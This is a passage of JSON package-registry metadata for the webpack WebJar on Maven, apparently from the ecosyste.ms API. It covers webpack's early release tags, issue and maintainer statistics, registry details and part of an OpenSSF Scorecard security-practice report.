v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T12:10:10.852Z","dependent_packages_count":14,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.979943940947386,"dependent_packages_count":4.268032094509865,"stargazers_count":0.272068988348786,"forks_count":0.6354295620210954,"average":9.288868646456782},"purl":"pkg:maven/org.webjars.npm/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.npm:webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.npm:webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.npm:webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:webpack/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620582,"maintainers_count":0,"namespaces_count":82431,"keywords_count":36859,"github":"maven-central","metadata":{"funded_packages_count":48141,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-02T05:05:01.920Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":5000703,"name":"org.webjars.npm:github-com-webpack-webpack","ecosystem":"maven","description":"WebJar for webpack","homepage":"http://webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"org.webjars.npm","versions_count":1,"first_release_published_at":"2017-05-11T18:45:09.000Z","latest_release_published_at":"2017-05-11T18:45:09.000Z","latest_release_number":"2.5.1","last_synced_at":"2026-09-03T00:15:56.139Z","created_at":"2022-07-27T10:58:36.783Z","updated_at":"2026-09-03T00:15:56.139Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.npm/github-com-webpack-webpack/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.npm/github-com-webpack-webpack/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: 